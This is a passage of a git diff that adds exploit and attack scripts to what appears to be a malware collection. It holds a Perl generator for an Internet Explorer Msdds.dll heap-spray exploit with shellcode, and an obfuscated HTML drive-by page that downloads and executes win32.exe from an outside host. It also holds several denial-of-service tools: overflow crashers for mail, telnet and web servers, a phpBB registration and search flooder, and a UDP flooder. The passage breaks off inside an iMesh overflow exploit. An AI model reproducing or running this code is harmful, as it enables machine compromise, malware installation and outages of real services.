+"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa". +"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656". +"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1". +"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353". +"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353". +"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe". +"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff". +"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n"; + +# Memory +my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n". +"headersize = 20;\n". +"slackspace = headersize+shellcode.length\n". +"while (bigblock.length<slackspace) bigblock+=bigblock;\n". +"fillblock = bigblock.substring(0, slackspace);\n". +"block = bigblock.substring(0, bigblock.length-slackspace);\n". +"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". +"memory = new Array();\n". +"for (i=0;i<700;i++) memory[i] = block + shellcode;\n". +"</SCRIPT>\n"; + +# Msdds.dll +my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'; + +# footer +my $footer = "<object classid=\"CLSID:".$clsid."\"></object></body></html>\n". +"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n"; + +# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin +print "$header $shellcode $code $footer"; \ No newline at end of file diff --git a/Perl/Constructor.Perl.Msdds.b b/Perl/Constructor.Perl.Msdds.b new file mode 100644 index 00000000..21f79ecd --- /dev/null +++ b/Perl/Constructor.Perl.Msdds.b @@ -0,0 +1,82 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> +<NOSCRIPT>This page uses Javascript</NOSCRIPT> +<SCRIPT LANGUAGE="javascript" TYPE="text/javascript"> +document.write(unescape("%3c%68%74%6d%6c%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%49%46%52%41%4d%45%20%73%72%63%3d%22%78%70%6c%2e%77%6d%66%22%0d%0a%20")); +document.write(unescape("%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%31%20%76%73%70%61%63%65%3d%31%20%68%73%70%61%63%65%3d%31%20%6d%61%72%67%69%6e%77")); +document.write(unescape("%69%64%74%68%3d%31%20%6d%61%72%67%69%6e%68%65%69%67%68%74%3d%31%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73")); +document.write(unescape("%63%72%6f%6c%6c%69%6e%67%3d%6e%6f%3e%0d%0a%20%20%3c%2f%49%46%52%41%4d%45%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%73%74%79")); +document.write(unescape("%6c%65%3e%0d%0a%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65")); +document.write(unescape("%74%2f%61%64%76%2f%30%31%2f%73%70%6c%6f%69%74%2e%61%6e%72%22%29%7d%0d%0a%3c%2f%73%74%79%6c%65%3e%0d%0a%3c%41%50%50%4c%45")); +document.write(unescape("%54%20%41%52%43%48%49%56%45%3d%27%63%6f%75%6e%74%2e%6a%61%72%27%20%43%4f%44%45%3d%27%42%6c%61%63%6b%42%6f%78%2e%63%6c%61")); +document.write(unescape("%73%73%27%20%57%49%44%54%48%3d%31%20%48%45%49%47%48%54%3d%31%3e%0d%0a%3c%50%41%52%41%4d%20%4e%41%4d%45%3d%27%75%72%6c%27")); +document.write(unescape("%20%56%41%4c%55%45%3d%27%68%74%74%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%77%69%6e%33")); +document.write(unescape("%32%2e%65%78%65%27%3e%3c%2f%41%50%50%4c%45%54%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%74%72%79%7b%0d%0a%64%6f%63%75%6d%65")); +document.write(unescape("%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%60%26%23%31%30%39%26%23%31%31%35%26%23%34%35%26%23")); +document.write(unescape("%31%30%35%26%23%31%31%36%26%23%31%31%35%26%23%35%38%26%23%31%30%39%26%23%31%30%34%26%23%31%31%36%26%23%31%30%39%26%23%31")); +document.write(unescape("%30%38%26%23%35%38%26%23%31%30%32%26%23%31%30%35%26%23%31%30%38%26%23%31%30%31%26%23%35%38%26%23%34%37%26%23%34%37%26%23")); +document.write(unescape("%36%37%26%23%35%38%26%23%39%32%26%23%31%30%32%26%23%31%31%31%3b%6f%2e%6d%68%74%21%27%2b%27%68%74%74%70%3a%2f%2f%67%61%6d")); +document.write(unescape("%65%34%75%73%65%72%2e%6e%65%74%2f%2f%61%64%76%2f%2f%30%31%2f%2f%74%61%72%67%2e%63%68%27%2b%27%6d%3a%3a%2f%74%61%72%67%27")); +document.write(unescape("%2b%27%65%74%2e%68%74%6d%60%20%74%79%70%65%3d%60%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%60%3e%3c%2f%6f%62%27%2b")); +document.write(unescape("%27%6a%65%63%74%3e%27%29%3b%0d%0a%7d%63%61%74%63%68%28%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69")); +document.write(unescape("%70%74%3e%0d%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25")); +document.write(unescape("%75%39%30%39%30%25%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65%25%75%30%30%34")); +document.write(unescape("%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30")); +document.write(unescape("%30%30%37%25%75%30%30%30%30%25%75%37%32%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25")); +document.write(unescape("%75%30%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75%31%33%65%38%25%75%30%30%30")); +document.write(unescape("%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36")); +document.write(unescape("%66%35%34%25%75%36%39%34%36%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30%30%25")); +document.write(unescape("%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30%36%61%25%75%30%30%36%61%25%75%30%39%65")); +document.write(unescape("%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36")); +document.write(unescape("%61%35%31%25%75%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25%75%65%38%30%30%25")); +document.write(unescape("%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30")); +document.write(unescape("%30%25%75%30%30%62%65%25%75%30%30%30%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62")); +document.write(unescape("%31%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36%32%36%39%25%75%36%31%37%32%25")); +document.write(unescape("%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34")); +document.write(unescape("%35%25%75%37%34%36%39%25%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38%25%75%37")); +document.write(unescape("%30%37%34%25%75%32%66%33%61%25%75%37%34%32%66%25%75%36%31%37%32%25%75%36%36%36%36%25%75%36%31%33%35%25%75%36%63%36%63%25")); +document.write(unescape("%75%36%32%32%65%25%75%37%61%36%39%25%75%36%31%32%66%25%75%37%36%36%34%25%75%33%30%32%66%25%75%32%66%33%31%25%75%36%39%37")); +document.write(unescape("%37%25%75%33%33%36%65%25%75%32%65%33%32%25%75%37%38%36%35%25%75%30%30%36%35%25%75%36%30%30%30%25%75%38%62%36%34%25%75%33")); +document.write(unescape("%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25")); +document.write(unescape("%75%30%38%35%62%25%75%64%61%38%39%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33")); +document.write(unescape("%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30%37%33%25%75%37%62%38%62%25%75%30")); +document.write(unescape("%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25")); +document.write(unescape("%75%31%33%31%65%25%75%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25%75%35%39%35")); +document.write(unescape("%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63")); +document.write(unescape("%31%30%37%25%75%30%32%65%30%25%75%37%33%38%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25")); +document.write(unescape("%75%38%35%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32%64%62%35%25%75%34%30%31")); +document.write(unescape("%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37")); +document.write(unescape("%32%35%30%25%75%36%33%36%66%25%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30%25")); +document.write(unescape("%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61%70%65%28%22%25%75%30%64%30%64%25%75")); +document.write(unescape("%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73")); +document.write(unescape("%75%62%73%74%72%69%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20%41%72%72%61%79")); +document.write(unescape("%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69")); +document.write(unescape("%6c%28%30%78%64%30%64%30%64%30%64%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61")); +document.write(unescape("%73%73%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d%42%31%43%33%2d%30%44%45%37")); +document.write(unescape("%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74")); +document.write(unescape("%73%5b%30%5d%2e%63%72%65%61%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63%68%28")); +document.write(unescape("%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%3c%21%2d%2d%0d%0a%66%75%6e%63%74%69%6f")); +document.write(unescape("%6e%20%66%28%62%2c%20%61%2c%20%63%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%20%2b%20%63%3b%20%7d%0d%0a%66%75%6e%63")); +document.write(unescape("%74%69%6f%6e%20%67%28%62%2c%20%61%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%3b%20%7d%0d%0a%76%61%72%20%73%20%3d%20")); +document.write(unescape("%6e%65%77%20%41%72%72%61%79%0d%0a%28%0d%0a%20%22%22%2c%0d%0a%20%22%77%69%6e%33%32%2e%65%78%65%22%2c%0d%0a%20%22%68%74%74")); +document.write(unescape("%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%22%2c%0d%0a%20%22%6f%62%6a%65%63%74%22%2c%0d")); +document.write(unescape("%0a%20%22%63%6c%61%73%73%69%64%22%2c%0d%0a%20%66%28%22%30%43%30%22%2c%20%67%28%66%28%67%28%22%33%2d%31%31%44%30%2d%39%22")); +document.write(unescape("%2c%20%22%35%36%2d%36%35%41%22%29%2c%20%22%69%64%3a%42%44%39%36%43%35%22%2c%20%22%38%33%41%2d%30%22%29%2c%20%22%63%6c%73")); +document.write(unescape("%22%29%2c%20%67%28%22%39%45%33%36%22%2c%20%22%34%46%43%32%22%29%29%2c%0d%0a%20%67%28%66%28%22%66%74%2e%58%4d%4c%48%22%2c")); +document.write(unescape("%20%22%6f%73%6f%22%2c%20%22%54%54%50%22%29%2c%20%22%4d%69%63%72%22%29%2c%0d%0a%20%66%28%22%45%22%2c%20%22%47%22%2c%20%22")); +document.write(unescape("%54%22%29%2c%0d%0a%20%66%28%67%28%22%2e%53%74%72%22%2c%20%22%6f%64%62%22%29%2c%20%22%41%64%22%2c%20%22%65%61%6d%22%29%2c")); +document.write(unescape("%0d%0a%20%66%28%67%28%22%2e%53%68%65%22%2c%20%22%69%70%74%22%29%2c%20%22%57%53%63%72%22%2c%20%22%6c%6c%22%29%2c%0d%0a%20")); +document.write(unescape("%22%50%52%4f%43%45%53%53%22%2c%0d%0a%20%22%54%4d%50%22%2c%0d%0a%20%22%2f%5b%5e%2f%5d%2a%24%22%2c%0d%0a%20%22%2f%22%2c%0d")); +document.write(unescape("%0a%20%22%5c%5c%22%0d%0a%29%3b%0d%0a%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%73")); +document.write(unescape("%5b%33%5d%29%3b%0d%0a%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%73%5b%34%5d%2c%20%73%5b%35%5d%29%3b%0d%0a%77%69%74%68")); +document.write(unescape("%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%36%5d%2c%20%73%5b%30%5d%29%29%0d%0a%7b%0d%0a%20%6f%70%65%6e%28%73")); +document.write(unescape("%5b%37%5d%2c%20%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%72%65%70%6c%61%63%65%28%6e%65%77%20%52%65%67%45%78%70%28%73%5b")); +document.write(unescape("%31%32%5d%29%2c%20%73%5b%31%33%5d%20%2b%20%73%5b%31%5d%29%2c%20%66%61%6c%73%65%29%3b%0d%0a%20%73%65%6e%64%28%29%3b%0d%0a")); +document.write(unescape("%20%69%66%28%73%74%61%74%75%73%20%3c%20%34%30%30%29%0d%0a%20%20%77%69%74%68%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74")); +document.write(unescape("%28%73%5b%38%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%7b%0d%0a%20%20%20%54%79%70%65%20%3d%20%31%3b%0d%0a%20%20%20%4f%70%65")); +document.write(unescape("%6e%28%29%3b%0d%0a%20%20%20%57%72%69%74%65%28%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%0d%0a%20%20%20%77%69%74%68%28%61")); +document.write(unescape("%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%39%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%20%7b%0d%0a%20%20%20%20%63%20")); +document.write(unescape("%3d%20%45%6e%76%69%72%6f%6e%6d%65%6e%74%28%73%5b%31%30%5d%29%28%73%5b%31%31%5d%29%20%2b%20%73%5b%31%34%5d%20%2b%20%73%5b")); +document.write(unescape("%31%5d%3b%0d%0a%20%20%20%20%53%61%76%65%54%6f%46%69%6c%65%28%63%2c%20%32%29%3b%0d%0a%20%20%20%20%45%78%65%63%28%63%29%3b")); +document.write(unescape("%0d%0a%20%20%20%7d%0d%0a%20%20%7d%0d%0a%7d%0d%0a%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%73%5b%32%5d%29%3b%0d")); +document.write(unescape("%0a%2f%2f%20%2d%2d%3e%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%74%6d%6c%3e")); +</SCRIPT> diff --git a/Perl/DoS.Perl.Avirt b/Perl/DoS.Perl.Avirt new file mode 100644 index 00000000..e612282d --- /dev/null +++ b/Perl/DoS.Perl.Avirt @@ -0,0 +1,47 @@ + +# Example for a possible DOS-attack against Avirt Mail Server ver3.5. +# There need to be 856 characters to overflow Server. +# Example : Trying example.com... +# Connected to example.com. +# Escape character is '^]'. +# +OK aVirt Mail POP3 Server Ready +# user fuckup +# +OK +# pass [856 characters] +# Overflow +# Hint : Avirt Mail Server ver3.3a has the same problem after 856 +# characters (but then you can exploit it) + +use IO::Socket; + +print "Possible DOS-attack against Avirt Mail Server ver3.5\n"; +print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; + +if (not $ARGV[1]) { + print "Usage: $0 [host] [username]\n\n"; + exit(0); +} + +sub connecthost { + $host = IO::Socket::INET->new ( Proto => "tcp", + PeerAddr => $ARGV[0], + PeerPort => "25",) or die "Can't open connection to $ARGV[0] because $!\n"; + $host->autoflush(1); +} + +$bufferoverflow .= "A" x 856; + +print "\nOpen connection...\n"; +&connecthost; +print "Sending characters...\n"; +print $host "user $ARGV[1]\n"; +print $host "pass $bufferoverflow\n"; +print "close connection...\n"; +close $host; + +print "\nTesting...\n"; +&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n"); +close $host; +die "The host $ARGV[0] is not vulnerable to this attack.\n"; + +# by arbon(arbon@gmx.de) \ No newline at end of file diff --git a/Perl/DoS.Perl.BBDoS.a b/Perl/DoS.Perl.BBDoS.a new file mode 100644 index 00000000..16c8b7af --- /dev/null +++ b/Perl/DoS.Perl.BBDoS.a @@ -0,0 +1,145 @@ +## Name: NsT-phpBBDoS (Perl Version) +## Copyright: Neo Security Team +## Author: HaCkZaTaN +## Ported: g30rg3_x +## Date: 20/06/05 +## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x +## A Simple phpBB Registration And Search DoS Flooder. +## +## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl +## [+] +## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN +## [+] ported to Perl By g30rg3_x +## [+] Neo Security Team +## [+] +## [+] Host |without http://www.| victimshost.com +## [+] Path |example. /phpBB2/ or /| /phpBB2/ +## [+] Flood Type |1=Registration 2=Search| 1 +## [+] .......................................................... +## [+] .......................................................... +## [+] .......................................................... +## [+] .............................................. +## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed +## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" + +use IO::Socket; + +## Initialized X +$x = 0; + +## Flood Variables Provided By User +print q( +NsT-phpBBDoS v0.2 by HaCkZaTaN +ported to Perl By g30rg3_x +Neo Security Team + +); +print q(Host |without http://www.| ); +$host = <STDIN>; +chop ($host); + +print q(Path |example. /phpBB2/ or /| ); +$pth = <STDIN>; +chop ($pth); + +print q(Flood Type |1 = Registration, 2 = Search| ); +$type = <STDIN>; +chop ($type); + +## If Type Is Equals To 1 or Registration +if($type == 1){ + +## User Loop for 9999 loops (enough for Flood xDDDD) +while($x != 9999) +{ + +## Building User in base X +$uname = "username=NsT__" . "$x"; + +## Building User Mail in base X +$umail = "&email=NsT__" . "$x"; + +## Final String to Send +$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; + +## Posit Length +$lrg = length $postit; + +## Connect Socket with Variables Provided By User +my $sock = new IO::Socket::INET ( + PeerAddr => "$host", + PeerPort => "80", + Proto => "tcp", + ); +die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; + +## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums +print $sock "POST $pth"."profile.php HTTP/1.1\n"; +print $sock "Host: $host\n"; +print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; +print $sock "Referer: $host\n"; +print $sock "Accept-Language: en-us\n"; +print $sock "Content-Type: application/x-www-form-urlencoded\n"; +print $sock "Accept-Encoding: gzip, deflate\n"; +print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; +print $sock "Connection: Keep-Alive\n"; +print $sock "Cache-Control: no-cache\n"; +print $sock "Content-Length: $lrg\n\n"; +print $sock "$postit\n"; +close($sock); + +## Print a "." for every loop +syswrite STDOUT, "."; + +## Increment X in One for every Loop +$x++; +} + +## If Type Is Equals To 2 or Search +} +elsif ($type == 2){ + +## User Search Loop for 9999 loops (enough for Flood xDDDD) +while($x != 9999) +{ +## Final Search String to Send +$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; + +## Posit Length +$lrg = length $postit; + +## Connect Socket with Variables Provided By User +my $sock = new IO::Socket::INET ( + PeerAddr => "$host", + PeerPort => "80", + Proto => "tcp", + ); +die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; + +## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums +print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; +print $sock "Host: $host\n"; +print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; +print $sock "Referer: $host\n"; +print $sock "Accept-Language: en-us\n"; +print $sock "Content-Type: application/x-www-form-urlencoded\n"; +print $sock "Accept-Encoding: gzip, deflate\n"; +print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; +print $sock "Connection: Keep-Alive\n"; +print $sock "Cache-Control: no-cache\n"; +print $sock "Content-Length: $lrg\n\n"; +print $sock "$postit\n"; +close($sock); + +## Print a "." for every loop +syswrite STDOUT, "."; + +## Increment X in One for every Loop +$x++; +} +}else{ +## STF??? What Do You Type + die "Option not Allowed O_o???\n"; +} + +# milw0rm.com [2005-06-22] \ No newline at end of file diff --git a/Perl/DoS.Perl.BBDoS.c b/Perl/DoS.Perl.BBDoS.c new file mode 100644 index 00000000..b92a7344 --- /dev/null +++ b/Perl/DoS.Perl.BBDoS.c @@ -0,0 +1,57 @@ +##################################################### +# udp flood. +# +# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc. +# +# --/odix +###################################################### + +use Socket; + +$ARGC=@ARGV; + +if ($ARGC !=3) { + printf "$0 <ip> <port> <time>\n"; + printf "if arg1/2 =0, randports/continous packets.\n"; + exit(1); +} + +my ($ip,$port,$size,$time); + $ip=$ARGV[0]; + $port=$ARGV[1]; + $time=$ARGV[2]; + +socket(crazy, PF_INET, SOCK_DGRAM, 17); + $iaddr = inet_aton("$ip"); + +printf "udp flood - KaN3\n"; + +if ($ARGV[1] ==0 && $ARGV[2] ==0) { + goto randpackets; +} +if ($ARGV[1] !=0 && $ARGV[2] !=0) { + system("(sleep $time;killall -9 udp) &"); + goto packets; +} +if ($ARGV[1] !=0 && $ARGV[2] ==0) { + goto packets; +} +if ($ARGV[1] ==0 && $ARGV[2] !=0) { + system("(sleep $time;killall -9 udp) &"); + goto randpackets; +} + +packets: +for (;;) { + $size=$rand x $rand x $rand; + send(crazy, 0, $size, sockaddr_in($port, $iaddr)); +} + +randpackets: +for (;;) { + $size=$rand x $rand x $rand; + $port=int(rand 65000) +1; + send(crazy, 0, $size, sockaddr_in($port, $iaddr)); +} + + diff --git a/Perl/DoS.Perl.Chopsui b/Perl/DoS.Perl.Chopsui new file mode 100644 index 00000000..ecafb7e0 --- /dev/null +++ b/Perl/DoS.Perl.Chopsui @@ -0,0 +1,38 @@ +# +# Argosoft Mail Server 1.0.0.2 DoS +# Chopsui-cide[MmM] 2000 +# +# ---------------------------------------------------------- +# Disclaimer: this file is intended as proof of concept, and +# is not intended to be used for illegal purposes. I accept +# no responsibility for damage incurred by the use of it. +# ---------------------------------------------------------- +# +# This will cause Argosoft Mail Server 1.0.0.2 to page fault if the finger +# daemon is running. +# + +use IO::Socket; + +$host = "tr" ; +$port = "79"; + +$count = 0; +$sod = ""; +$len = 3000; +while($count < $len) { + $sod .= "X"; + $count += 1; +} +$sod .= "\@X"; +$count = 0; +while($count < 5) { +print "Connecting to $host:$port..."; +$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n"; +print "done.\n"; +print $socket "$sod\x0a"; +sleep(5); +close($socket); +$count += 1; +} + diff --git a/Perl/DoS.Perl.Fusion b/Perl/DoS.Perl.Fusion new file mode 100644 index 00000000..7f302d9f --- /dev/null +++ b/Perl/DoS.Perl.Fusion @@ -0,0 +1,43 @@ + +# Example for a possible DOS-attack against Byte Fusion Telnet. +# There need to be 3090 characters to overflow Server. +# Example : Trying example.com... +# Connected to example.com. +# Escape character is '^]'. +# Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation +# Unregistered Evaluation. See www.bytefusion.com/telnet.html +# (Machine name) Login: [more then 3090 characters] +# Overflow + +use IO::Socket; + +print "Possible DOS-attack against Byte Fusion Telnet\n"; +print "++++++++++++++++++++++++++++++++++++++++++++++\n"; + +if (not $ARGV[0]) { + print "Usage: $0 [host]\n\n"; + exit(0); +} + +sub connecthost { + $host = IO::Socket::INET->new ( Proto => "tcp", + PeerAddr => $ARGV[0], + PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n"; + $host->autoflush(1); +} + +$bufferoverflow .= "A" x 3090; + +print "\nOpen connection...\n"; +&connecthost; +print "Sending characters...\n"; +print $host "$bufferoverflow\n"; +print "close connection...\n"; +close $host; + +print "\nTesting...\n"; +&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n"); +close $host; +die "The host $ARGV[0] is not vulnerable to this attack.\n"; + +# by arbon(arbon@gmx.de) \ No newline at end of file diff --git a/Perl/DoS.Perl.Httux b/Perl/DoS.Perl.Httux new file mode 100644 index 00000000..93b5c4a0 --- /dev/null +++ b/Perl/DoS.Perl.Httux @@ -0,0 +1,44 @@ +use IO::Socket; + +#USE . +#./tuxDOS.pl www.some.com.mx 80 +#TUX HTTPD Denial of Service for RedHat 7.2 +#hecho por malcom-x +#cantact : malcomX@antisocial.com +##################################################################### + + +if(@ARGV == 2){ + my $host = $ARGV[0]; + my $port = $ARGV[1]; + $EOL = "\015\012"; + $BLANK = $EOL x 2; + #you can increment num of request in $sm change this value -> 6000 <-, for enlarge host. + $sm = A x 6000; + + $sock = IO::Socket::INET->new(PeerAddr => $host, + PeerPort => "$port", + Proto => 'tcp'); + unless($sock){ + die "jeje Not vulnerable try later."; + } + $sock->autoflush(1); + + print $sock "GET / HTTP/1.0\nAccept: */*\nHost: ". $sm ."\n" .$BLANK; + while ( <$sock> ){ + print; + } + + close $sock; + }else{ + print "[Usage]...\n./tuxDOS.pl 'HosT' [port] \n"; +} + + + + + + + + + diff --git a/Perl/DoS.Perl.Imesh.102 b/Perl/DoS.Perl.Imesh.102 new file mode 100644 index 00000000..f3c7b629 --- /dev/null +++ b/Perl/DoS.Perl.Imesh.102 @@ -0,0 +1,57 @@ +# +# iMesh 1.02 vulnerability +# Chopsui-cide[MmM] 2000 +# http://midgets.box.sk/ +# +# ---------------------------------------------------------- +# Disclaimer: this file is intended as proof of concept, and +# is not intended to be used for illegal purposes. I accept +# no responsibility for damage incurred by the use of it. +# ---------------------------------------------------------- +# +# A buffer overflow exists in iMesh 1.02 that allows the execution +# of arbitrary code. When the iMesh client connects to a server, +# the server is able to exploit the vulnerability and execute +# arbitrary code on the system the client is running on. +# + +use IO::Socket; + +$localhost = "localhost"; +$port = "5000"; + +# Dummy payload +$payload = ""; +$c = 0; +while($c < 0x1aa) { + $payload .= "\x90"; + $c += 1; +}; +$payload .= "\xcc"; # raise exception 03h + +$es = ""; +$c = 0; +while($c < 0x2723) { + $es .= "\x90"; + $c += 1; +}; +$es .= "\x43\x04\x43\x00"; +$c = 0; +while($c < 